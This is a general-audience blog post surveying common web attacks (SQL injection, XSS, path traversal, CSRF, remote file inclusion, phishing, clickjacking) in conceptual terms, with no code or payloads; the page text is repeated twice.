Web Security – Different types of attacks
Web security is an interesting topic and anyone who works on web development should pay attention on this topic as well. Ineffective web security may lead to several issues that we usually hear about the web: spam, virus, identity theft …
On a report from Cenzic, a web security company, we have an overall look at the different types of web attacks, and percentage of that kind of attack happen on internet.
Let’s go through all of these things and explain what they are and do.
1. SQL Injection
With an SQL injection, an attacker accesses your database by sending an SQL command to your server via the URI or form fields. You can find more information about SQL injection here - http://en.wikipedia.org/wiki/SQL_injection.
2. Cross-Site Scripting (XSS)
Cross-site scripting is probably the biggest and most common problem. With it, an attacker injects JavaScript code into your document by adding it to the end of the URI as a parameter or in a form field.
3. Path Traversal
Allowing for path or directory traversal on your server is an amazingly bad idea. You would be allowing people to list the folders on your server and to navigate from folder to folder. This allows attackers to go to folders with sensitive information or website functionality and have some fun.
4. Cross-Site Request Forgery
Cross-site request forgery (CSRF) exploits browsers and websites that allow for functionality to be called without really knowing that an actual user initiated it
5. Remote File Inclusion (RFI)
With Remote file inclusion or code injection, an attacker uses a flaw in your website to inject code from another server to run on yours. It is in the same family as XSS but much more problematic because you have full access to your server (with JavaScript, you can steal cookies and call other code, but you can’t access the file system without resorting to tricks with Flash or Java Applets).
Any code injected to your server with an untested variable and include() command, for example, could run server commands: upload and download and transfer data to other servers, check your server passwords and user names, anything you can do on the command line via PHP or ASP if your server allows for it.
This is probably the worst that can happen to your server, because with command line access, I could turn it into an attack machine for a server network attack, silently listen to everything you and your users do on the server and send it to another Web resource, store information and viruses for distribution, inject spam links, you name it.
6. Phishing
Phishing is the technique of fooling people into entering information into a bad website. You show end users an interface that looks legit (for a bank or what have you) but that in reality sends their information to your database. Because phishing is a felony, I cannot show you a demo.
The trick with phishing is to make the form really look like it comes from a website you trust. You have probably gotten emails saying that your “XYZ bank account” has been compromised, and you know for certain that this isn’t the case because you have no account with that bank and may not have even heard of it. This is a wild-guess phishing attempt, which is not usually effective.
7. Clickjacking
Clickjacking is a terribly clever way to use CSS and inline frames to trick users into clicking something without knowing it. By clickjacking, you can make end users do things without knowing it. Every action on a website that can be performed with a simple click can be exploited with this trick.
Clickjacking is a massive problem because it is done via CSS, not a script. Unless browsers block frames from having an opacity of 0, there is no simple workaround. The main counter-measure people take is to disallow embedding in frames using JavaScript. However, with JavaScript off, clickjacking still works.
In the next article, we will discuss about how to increase web security.
28
comment(s)
Web Security – Different types of attacks
By: Tung Tram
Web security is an interesting topic and anyone who works on web development should pay attention on this topic as well. Ineffective web security may lead to several issues that we usually hear about the web: spam, virus, identity theft …
On a report from Cenzic, a web security company, we have an overall look at the different types of web attacks, and percentage of that kind of attack happen on internet.
Let’s go through all of these things and explain what they are and do.
1. SQL Injection
With an SQL injection, an attacker accesses your database by sending an SQL command to your server via the URI or form fields. You can find more information about SQL injection here - http://en.wikipedia.org/wiki/SQL_injection.
2. Cross-Site Scripting (XSS)
Cross-site scripting is probably the biggest and most common problem. With it, an attacker injects JavaScript code into your document by adding it to the end of the URI as a parameter or in a form field.
3. Path Traversal
Allowing for path or directory traversal on your server is an amazingly bad idea. You would be allowing people to list the folders on your server and to navigate from folder to folder. This allows attackers to go to folders with sensitive information or website functionality and have some fun.
4. Cross-Site Request Forgery
Cross-site request forgery (CSRF) exploits browsers and websites that allow for functionality to be called without really knowing that an actual user initiated it
5. Remote File Inclusion (RFI)
With Remote file inclusion or code injection, an attacker uses a flaw in your website to inject code from another server to run on yours. It is in the same family as XSS but much more problematic because you have full access to your server (with JavaScript, you can steal cookies and call other code, but you can’t access the file system without resorting to tricks with Flash or Java Applets).
Any code injected to your server with an untested variable and include() command, for example, could run server commands: upload and download and transfer data to other servers, check your server passwords and user names, anything you can do on the command line via PHP or ASP if your server allows for it.
This is probably the worst that can happen to your server, because with command line access, I could turn it into an attack machine for a server network attack, silently listen to everything you and your users do on the server and send it to another Web resource, store information and viruses for distribution, inject spam links, you name it.
6. Phishing
Phishing is the technique of fooling people into entering information into a bad website. You show end users an interface that looks legit (for a bank or what have you) but that in reality sends their information to your database. Because phishing is a felony, I cannot show you a demo.
The trick with phishing is to make the form really look like it comes from a website you trust. You have probably gotten emails saying that your “XYZ bank account” has been compromised, and you know for certain that this isn’t the case because you have no account with that bank and may not have even heard of it. This is a wild-guess phishing attempt, which is not usually effective.
7. Clickjacking
Clickjacking is a terribly clever way to use CSS and inline frames to trick users into clicking something without knowing it. By clickjacking, you can make end users do things without knowing it. Every action on a website that can be performed with a simple click can be exploited with this trick.
Clickjacking is a massive problem because it is done via CSS, not a script. Unless browsers block frames from having an opacity of 0, there is no simple workaround. The main counter-measure people take is to disallow embedding in frames using JavaScript. However, with JavaScript off, clickjacking still works.
In the next article, we will discuss about how to increase web security.